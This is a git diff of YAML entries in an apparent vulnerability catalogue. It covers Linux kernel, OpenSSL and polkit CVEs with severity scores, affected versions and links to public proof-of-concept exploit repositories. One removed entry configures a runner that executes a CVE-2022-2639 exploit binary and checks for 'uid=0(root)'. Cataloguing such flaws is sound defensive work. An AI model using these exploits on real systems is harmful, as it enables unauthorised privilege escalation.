https://github.com/szymonh/d-os-descriptor
|
||||
source: https://github.com/szymonh/d-os-descriptor
|
||||
info:
|
||||
name: Linux kernel是Linux操作系统的主要组件,也是计算机硬件与其进程之间的核心接口。它负责两者之间的通信,还要尽可能高效地管理资源。Linux kernel主要负责内存管理、进程管理、设备驱动程序、系统调用和安全防护四项作用。
|
||||
severity: medium
|
||||
|
|
|
|||
|
|
@ -10,10 +10,10 @@ info:
|
|||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/cve-2022-25265
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.8
|
||||
cve-id: CVE-2022-25265
|
||||
cwe-id: CWE-913
|
||||
cnvd-id: none
|
||||
kve-id: none
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: Linux kernel, 内存损坏
|
||||
|
|
@ -14,5 +14,7 @@ info:
|
|||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.8
|
||||
cve-id: CVE-2022-25636
|
||||
cnvd-id: CNNVD-202202-1743
|
||||
tags: 堆越界,权限提升,cve2022
|
||||
cwe-id: CWE-269
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: 堆越界, 权限提升, cve2022
|
||||
|
|
|
|||
|
|
@ -25,5 +25,7 @@ info:
|
|||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 6.7
|
||||
cve-id: CVE-2022-2586
|
||||
cnvd-id: NONE
|
||||
cwe-id: None
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: netfilter, cve2022
|
||||
|
|
@ -15,6 +15,6 @@ info:
|
|||
cvss-score: 7.8
|
||||
cve-id: CVE-2022-2588
|
||||
cwe-id: CWE-416
|
||||
cnvd-id:
|
||||
kve-id:
|
||||
tags: UAF,拒绝服务,权限提升,cve2022
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: UAF, 拒绝服务, 权限提升, cve2022
|
||||
|
|
@ -1,19 +0,0 @@
|
|||
id: CVE-2022-2602
|
||||
source: https://seclists.org/oss-sec/2022/q4/57
|
||||
info:
|
||||
name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
|
||||
severity: high
|
||||
description: |
|
||||
io_uring UAF, Unix SCM garbage collection
|
||||
scope-of-influence:
|
||||
Linux kernel < 5.10.149-1
|
||||
reference:
|
||||
- https://ubuntu.com/security/CVE-2022-2602
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1
|
||||
cvss-score: 漏洞评分
|
||||
cve-id: CVE-2022-2602
|
||||
cwe-id: None
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: cve2022,UAF
|
||||
|
|
@ -1,48 +1,20 @@
|
|||
FormatVer: 20220411
|
||||
Id: CVE-2022-2639
|
||||
Belong: kernel
|
||||
PocHazardLevel: low
|
||||
Source: https://github.com/avboy1337/CVE-2022-2639-PipeVersion
|
||||
SiteInfo:
|
||||
Name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核
|
||||
Severity: high
|
||||
Description:
|
||||
id: CVE-2022-2639
|
||||
source: https://github.com/avboy1337/CVE-2022-2639-PipeVersion
|
||||
info:
|
||||
name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核
|
||||
severity: high
|
||||
description:
|
||||
由于 openvswitch模块中reserve_sfa_size()函数在使用过程中存在缺陷,导致本地经过身份认证的攻击者可以利用漏洞提升至root权限
|
||||
ScopeOfInfluence:
|
||||
kernel(>=3.13 && <5.18)
|
||||
References:
|
||||
scopeOfInfluence:
|
||||
3.13 ≤ Linux-Kernel < 5.18
|
||||
references:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-2639
|
||||
- https://github.com/torvalds/linux/commit/cefa91b2332d7009bc0be5d951d6cbbf349f90f8
|
||||
SiteClassification:
|
||||
CvssMetrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
CvssScore: 7.8
|
||||
CveId: CVE-2022-2639
|
||||
CweId: None
|
||||
CnvdId: None
|
||||
KveId: None
|
||||
Tags:
|
||||
- ve2022
|
||||
- 权限提升
|
||||
SiteRequests:
|
||||
Implement:
|
||||
ImArray:
|
||||
- Exec : "CVE-2022-2639_x86_64"
|
||||
Args :
|
||||
ExpireTime: 30 #second
|
||||
|
||||
# < input
|
||||
# > output
|
||||
# . wait
|
||||
# ? condition
|
||||
# : content
|
||||
#
|
||||
#组合起来
|
||||
# >. 等待直到输出
|
||||
# << 输入字符
|
||||
# >?判断条件
|
||||
Inter:
|
||||
- ">.:infinitely ..." #等待输出'infinitely ...'
|
||||
- "<<:id\n" #输入'id\n'
|
||||
- ">.:\n" #等待输出'\n'
|
||||
- ">?:uid=0(root)" #判断输出为'uid=0(root)'为成功
|
||||
Condition: None
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.8
|
||||
cve-id: CVE-2022-2639
|
||||
cwe-id: CWE-171, CWE-787, CWE-192
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: cve2022, 权限提升
|
||||
|
|
@ -6,7 +6,7 @@ info:
|
|||
description: |
|
||||
Linux kernel 5.16.15之前版本存在安全漏洞,该漏洞源于net/ipv4/esp4.c 和 net/ipv6/esp6.c 中IPsec ESP 代码存在缓冲区溢出。本地攻击者可利用该漏洞通过覆盖内核堆对象获得特权。
|
||||
scope-of-influence:
|
||||
~ linux kernel 5.17-rc5
|
||||
linux kernel < 5.17-rc5
|
||||
reference:
|
||||
- https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.16.15
|
||||
- https://www.debian.org/security/2022/dsa-5173
|
||||
|
|
@ -15,4 +15,7 @@ info:
|
|||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.8
|
||||
cve-id: CVE-2022-27666
|
||||
tags: 缓冲区溢出,权限提升,cve2022
|
||||
cwe-id: CWE-787
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: 缓冲区溢出, 权限提升, cve2022
|
||||
|
|
@ -14,5 +14,7 @@ info:
|
|||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.8
|
||||
cve-id: CVE-2022-32250
|
||||
cnvd-id: CNNVD-202206-407
|
||||
tags: CVSS严重性评级,修复信息,易受攻击的软件版本,SCAP映射,CPE信息,cve2022
|
||||
cwe-id: CWE-416
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: Linux Kernel, cve2022
|
||||
|
|
|
|||
|
|
@ -6,7 +6,7 @@ info:
|
|||
description: |
|
||||
Linux kernel 5.18.9版本及之前版本存在安全漏洞,该漏洞源于。本地攻击者利用该漏洞使用 nft_set_elem_init 中的类型混淆错误(导致缓冲区溢出)来提升权限。
|
||||
scope-of-influence:
|
||||
Linux kernel(>=5.8.0 && <=5.18.9)
|
||||
5.8.0 ≤ Linux kernel ≤ 5.18.9
|
||||
reference:
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34918
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-34918
|
||||
|
|
|
|||
|
|
@ -1,18 +1,21 @@
|
|||
id: CVE-2022-36946
|
||||
source: https://github.com/Pwnzer0tt1/CVE-2022-36946
|
||||
info:
|
||||
name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
|
||||
severity: 高危
|
||||
description: |
|
||||
Linux5.18.14 内核中 net/netfilter/nfnetlink_queue.c 的nfqnl_mangle允许远程攻击者造成拒绝服务 (panic),因为在具有单字节nfta_payload属性的nf_queue判定的情况下,skb_pull可能会遇到负的 skb->len。
|
||||
scope-of-influence:
|
||||
5.18.14
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-36946
|
||||
- https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=722d94847de29310e8aa03fcbdb41fc92c521756
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36946
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2022-36946
|
||||
tags: 拒绝服务,cve2022
|
||||
id: CVE-2022-36946
|
||||
source: https://github.com/Pwnzer0tt1/CVE-2022-36946
|
||||
info:
|
||||
name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
|
||||
severity: High
|
||||
description: |
|
||||
Linux5.18.14 内核中 net/netfilter/nfnetlink_queue.c 的nfqnl_mangle允许远程攻击者造成拒绝服务 (panic),因为在具有单字节nfta_payload属性的nf_queue判定的情况下,skb_pull可能会遇到负的 skb->len。
|
||||
scope-of-influence:
|
||||
Linux-Kernel = 5.18.14
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-36946
|
||||
- https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=722d94847de29310e8aa03fcbdb41fc92c521756
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36946
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2022-36946
|
||||
cwe-id: None
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: 拒绝服务, cve2022
|
||||
|
|
@ -6,11 +6,11 @@ info:
|
|||
description: |
|
||||
在5.19.10之前的Linux内核中的drivers/media/dvb-core/dmxdev.c中,存在由refcount竞争导致的释放后使用,影响dvb_demux_open和dvb_dmxdev_release。
|
||||
scope-of-influence:
|
||||
Linux内核5.19.10之前的所有版本
|
||||
Linux-Kernel < 5.19.10
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/cve-2022-41218
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
|
||||
cvss-score: 5.5
|
||||
cve-id: CVE-2022-41218
|
||||
cwe-id: CWE-416
|
||||
|
|
|
|||
|
|
@ -2,17 +2,18 @@ id: CVE-2023-0045
|
|||
source: https://github.com/es0j/CVE-2023-0045
|
||||
info:
|
||||
name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
|
||||
severity: 超危
|
||||
severity: High
|
||||
description: Linux kernel存在安全漏洞,该漏洞源于绕过Spectre-BTI用户空间缓解措施。基于linux操作系统的Intel、AMD和 Arm 等现代处理器,被发现存在一个漏洞,攻击者可以绕过现有硬件防护缓解措施,实施Spectre BTI推测执行攻击,从而访问内存数据,可能引起信息泄漏。用于推测控制的prctl系统调用的当前实现未能保护用户免受在缓解之前执行的攻击者的攻击。seccomp缓解在此场景中也失败了。
|
||||
scope-of-influence:
|
||||
5.5~5.15
|
||||
5.5 ≤ Linux-Kernel ≤ 5.15
|
||||
reference:
|
||||
- https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2023-0179
|
||||
- https://docs.kernel.org/userspace-api/spec_ctrl.html
|
||||
- https://elixir.bootlin.com/linux/v5.15.56/source/arch/x86/kernel/cpu/bugs.c#L1467
|
||||
- https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2023-0045
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-0045
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2023-0045
|
||||
cwe-id:
|
||||
tags: 推测攻击,信息泄露,cve2023
|
||||
cwe-id: CWE-610
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: 推测攻击, 信息泄露, cve2023
|
||||
|
|
@ -19,5 +19,7 @@ info:
|
|||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.8
|
||||
cve-id: CVE-2023-0179
|
||||
cnvd-id: NONE
|
||||
tags: 缓冲区溢出,cve2023
|
||||
cwe-id: CWE-190
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: 缓冲区溢出, cve2023
|
||||
|
|
@ -1,6 +1,5 @@
|
|||
id: CVE-2016-2107
|
||||
source:
|
||||
https://github.com/FiloSottile/CVE-2016-2107
|
||||
source: https://github.com/FiloSottile/CVE-2016-2107
|
||||
info:
|
||||
name: OpenSSL是Openssl团队的一个开源的能够实现安全套接层(SSLv2/v3)和安全传输层(TLSv1)协议的通用加密库。该产品支持多种加密算法,包括对称密码、哈希算法、安全散列算法等。
|
||||
severity: medium
|
||||
|
|
|
|||
|
|
@ -1,6 +1,5 @@
|
|||
id: CVE-2021-3449
|
||||
source:
|
||||
https://github.com/terorie/cve-2021-3449
|
||||
source: https://github.com/terorie/cve-2021-3449
|
||||
info:
|
||||
name: OpenSSL是Openssl团队的一个开源的能够实现安全套接层(SSLv2/v3)和安全传输层(TLSv1)协议的通用加密库。该产品支持多种加密算法,包括对称密码、哈希算法、安全散列算法等。
|
||||
severity: medium
|
||||
|
|
|
|||
|
|
@ -4,11 +4,12 @@ info:
|
|||
name: OpenSSL是Openssl团队的一个开源的能够实现安全套接层(SSLv2/v3)和安全传输层(TLSv1)协议的通用加密库。该产品支持多种加密算法,包括对称密码、哈希算法、安全散列算法等。
|
||||
severity: High
|
||||
description: 漏洞出自BN_mod_sqrt()接口函数,它用于计算模平方根,且期望参数p应该是个质数,但是函数内并没有进行检查,这导致内部可能出现无限循环。
|
||||
scope-of-influence: Openssl 1.0.2, 1.1.1 和 3.0 版本
|
||||
scope-of-influence:
|
||||
Openssl 1.0.2, 1.1.1 和 3.0 版本
|
||||
reference:
|
||||
- https://cert-portal.siemens.com/productcert/pdf/ssa-712929.pdf
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2022-0778
|
||||
cwe-id: CWE-835
|
||||
|
|
|
|||
|
|
@ -19,4 +19,4 @@ info:
|
|||
cwe-id: CWE-787
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: 拒绝服务,DoS,cve2022,RCE,远程代码执行
|
||||
tags: 拒绝服务, DoS, cve2022, RCE, 远程代码执行
|
||||
|
|
@ -24,4 +24,4 @@ info:
|
|||
cwe-id: CWE-120
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: 缓存溢出,BOF,拒绝服务,DoS,cve2022,RCE,远程代码执行
|
||||
tags: 缓存溢出, BOF, 拒绝服务, DoS, cve2022, RCE, 远程代码执行
|
||||
|
|
@ -18,4 +18,4 @@ info:
|
|||
cwe-id: CWE-415
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: 拒绝服务,DoS
|
||||
tags: 拒绝服务, DoS
|
||||
|
|
@ -6,7 +6,7 @@ info:
|
|||
description: |
|
||||
发现polkit可能被欺骗,绕过D-Bus请求的凭据检查,将请求者的权限提升到root用户。
|
||||
scope-of-influence:
|
||||
0.105 ≥ policykit ≥ 0.113
|
||||
0.105 ≤ policykit ≤ 0.113
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-3560
|
||||
- https://ubuntu.com/security/CVE-2021-3560
|
||||
|
|
@ -14,7 +14,7 @@ info:
|
|||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.8
|
||||
cve-id: CVE-2021-3560
|
||||
cwe-id: CWE-754,CWE-863
|
||||
cwe-id: CWE-754, CWE-863
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: cve2021,权限提升
|
||||
tags: cve2021, 权限提升
|
||||
|
|
@ -14,7 +14,7 @@ info:
|
|||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.8
|
||||
cve-id: CVE-2021-4034
|
||||
cwe-id: CWE-787,CWE-125
|
||||
cwe-id: CWE-787, CWE-125
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: cve2021,权限提升
|
||||
tags: cve2021, 权限提升
|
||||
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue